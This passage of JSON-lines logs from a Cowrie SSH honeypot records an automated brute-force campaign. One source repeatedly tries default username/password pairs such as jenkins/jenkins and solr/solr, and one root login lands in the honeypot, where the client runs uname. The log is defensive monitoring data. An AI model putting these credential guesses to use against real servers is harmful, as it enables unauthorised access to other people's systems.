"],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:46:55.146197Z","src_ip":"212.227.125.160","session":"83b7b3011b2b"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch","message":"login attempt [elasticsearch/elasticsearch] failed","sensor":"my-vps","timestamp":"2025-08-26T21:46:55.339839Z","src_ip":"212.227.125.160","session":"83b7b3011b2b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:46:56.417355Z","src_ip":"212.227.125.160","session":"83b7b3011b2b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50472,"dst_ip":"1.2.3.4","dst_port":22,"session":"65e7487a2d30","protocol":"ssh","message":"New connection: 217.72.205.35:50472 (1.2.3.4:22) [session: 65e7487a2d30]","sensor":"my-vps","timestamp":"2025-08-26T21:46:59.027030Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:46:59.028816Z","src_ip":"217.72.205.35","session":"65e7487a2d30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39890,"dst_ip":"1.2.3.4","dst_port":22,"session":"047fccdbb1b2","protocol":"ssh","message":"New connection: 212.227.125.160:39890 (1.2.3.4:22) [session: 047fccdbb1b2]","sensor":"my-vps","timestamp":"2025-08-26T21:47:00.544793Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:47:00.545925Z","src_ip":"212.227.125.160","session":"047fccdbb1b2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:47:00.602311Z","src_ip":"212.227.125.160","session":"047fccdbb1b2"}
{"eventid":"cowrie.login.failed","username":"bigdata","password":"bigdata","message":"login attempt [bigdata/bigdata] failed","sensor":"my-vps","timestamp":"2025-08-26T21:47:00.772096Z","src_ip":"212.227.125.160","session":"047fccdbb1b2"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:47:01.825338Z","src_ip":"212.227.125.160","session":"047fccdbb1b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35278,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a538a94e637","protocol":"ssh","message":"New connection: 212.227.125.160:35278 (1.2.3.4:22) [session: 0a538a94e637]","sensor":"my-vps","timestamp":"2025-08-26T21:47:06.007001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:47:06.008194Z","src_ip":"212.227.125.160","session":"0a538a94e637"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:47:06.055010Z","src_ip":"212.227.125.160","session":"0a538a94e637"}
{"eventid":"cowrie.login.failed","username":"kingbase","password":"kingbase","message":"login attempt [kingbase/kingbase] failed","sensor":"my-vps","timestamp":"2025-08-26T21:47:06.224601Z","src_ip":"212.227.125.160","session":"0a538a94e637"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:47:07.281620Z","src_ip":"212.227.125.160","session":"0a538a94e637"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58896,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfa415ac8864","protocol":"ssh","message":"New connection: 212.227.125.160:58896 (1.2.3.4:22) [session: cfa415ac8864]","sensor":"my-vps","timestamp":"2025-08-26T21:47:11.539722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:47:11.584334Z","src_ip":"212.227.125.160","session":"cfa415ac8864"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:47:11.603238Z","src_ip":"212.227.125.160","session":"cfa415ac8864"}
{"eventid":"cowrie.login.failed","username":"hestiamail","password":"hestiamail","message":"login attempt [hestiamail/hestiamail] failed","sensor":"my-vps","timestamp":"2025-08-26T21:47:12.375851Z","src_ip":"212.227.125.160","session":"cfa415ac8864"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:47:13.446368Z","src_ip":"212.227.125.160","session":"cfa415ac8864"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54286,"dst_ip":"1.2.3.4","dst_port":22,"session":"435283b86382","protocol":"ssh","message":"New connection: 212.227.125.160:54286 (1.2.3.4:22) [session: 435283b86382]","sensor":"my-vps","timestamp":"2025-08-26T21:47:18.539144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:47:18.687196Z","src_ip":"212.227.125.160","session":"435283b86382"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:47:18.687887Z","src_ip":"212.227.125.160","session":"435283b86382"}
{"eventid":"cowrie.login.failed","username":"solr","password":"solr","message":"login attempt [solr/solr] failed","sensor":"my-vps","timestamp":"2025-08-26T21:47:19.445449Z","src_ip":"212.227.125.160","session":"435283b86382"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:47:20.497619Z","src_ip":"212.227.125.160","session":"435283b86382"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49674,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b660035c1ae","protocol":"ssh","message":"New connection: 212.227.125.160:49674 (1.2.3.4:22) [session: 5b660035c1ae]","sensor":"my-vps","timestamp":"2025-08-26T21:47:23.631017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:47:23.663541Z","src_ip":"212.227.125.160","session":"5b660035c1ae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:47:23.720873Z","src_ip":"212.227.125.160","session":"5b660035c1ae"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"jenkins","message":"login attempt [jenkins/jenkins] failed","sensor":"my-vps","timestamp":"2025-08-26T21:47:23.986916Z","src_ip":"212.227.125.160","session":"5b660035c1ae"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:47:25.063509Z","src_ip":"212.227.125.160","session":"5b660035c1ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45064,"dst_ip":"1.2.3.4","dst_port":22,"session":"047011bbcf7c","protocol":"ssh","message":"New connection: 212.227.125.160:45064 (1.2.3.4:22) [session: 047011bbcf7c]","sensor":"my-vps","timestamp":"2025-08-26T21:47:29.475525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:47:29.476176Z","src_ip":"212.227.125.160","session":"047011bbcf7c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:47:29.527700Z","src_ip":"212.227.125.160","session":"047011bbcf7c"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:47:29.682231Z","src_ip":"212.227.125.160","session":"047011bbcf7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:47:29.850477Z","src_ip":"212.227.125.160","session":"047011bbcf7c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:47:29.851171Z","src_ip":"212.227.125.160","session":"047011bbcf7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:47:29.916623Z","src_ip":"212.227.125.160","session":"047011bbcf7c"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:47:29.917652Z","src_ip":"212.227.125.160","session":"047011bbcf7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40450,"dst_ip":"1.2.3.4","dst_port":22,"session":"36b8e5b544cb","protocol":"ssh","message":"New connection: 212.227.125.160:40450 (1.2.3.4:22) [session: 36b8e5b544cb]","sensor":"my-vps","timestamp":"2025-08-26T21:47:35.161277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:47:35.162246Z","src_ip":"212.227.125.160","session":"36b8e5b544cb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:47:35.515666Z","src_ip":"212.227.125.160","session":"36b8e5b544cb"}
{"eventid":"cowrie.login.failed","username":"devops","password":"devops","message":"login attempt [devops/devops] failed","sensor":"my-vps","timestamp":"2025-08-26T21:47:35.715997Z","src_ip":"212.227.125.160","session":"36b8e5b544cb"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:47:36.782819Z","src_ip":"212.227.125.160","session":"36b8e5b544cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35836,"dst_ip":"1.2.3.4","dst_port":22,"session":"88175419f872","protocol":"ssh","message":"New connection: 212.227.125.160:35836 (1.2.3.4:22) [session: 88175419f872]","sensor":"my-vps","timestamp":"2025-08-26T21:47:41.231227Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:47:41.253345Z","src_ip":"212.227.125.160","session":"88175419f872"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:47:41.280562Z","src_ip":"212.227.125.160","session":"88175419f872"}
{"eventid":"cowrie.login.failed","username":"wang","password":"123456","message":"login attempt [wang/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:47:41.478468Z","src_ip":"212.227.125.160","session":"88175419f872"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:47:42.529705Z","src_ip":"212.227.125.160","session":"88175419f872"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59456,"dst_ip":"1.2.3.4","dst_port":22,"session":"6389ae9b773e","protocol":"ssh","message":"New connection: 212.227.125.160:59456 (1.2.3.4:22) [session: 6389ae9b773e]","sensor":"my-vps","timestamp":"2025-08-26T21:47:46.480482Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:47:46.491098Z","src_ip":"212.227.125.160","session":"6389ae9b773e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:47:46.530309Z","src_ip":"212.227.125.160","session":"6389ae9b773e"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-26T21:47:46.705820Z","src_ip":"212.227.125.160","session":"6389ae9b773e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:47:47.752691Z","src_ip":"212.227.125.160","session":"6389ae9b773e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54844,"dst_ip":"1.2.3.4","dst_port":22,"session":"d480445224c1","protocol":"ssh","message":"New connection: 212.227.125.160:54844 (1.2.3.4:22) [session: d480445224c1]","sensor":"my-vps","timestamp":"2025-08-26T21:47:52.252592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:47:52.254344Z","src_ip":"212.227.125.160","session":"d480445224c1"}
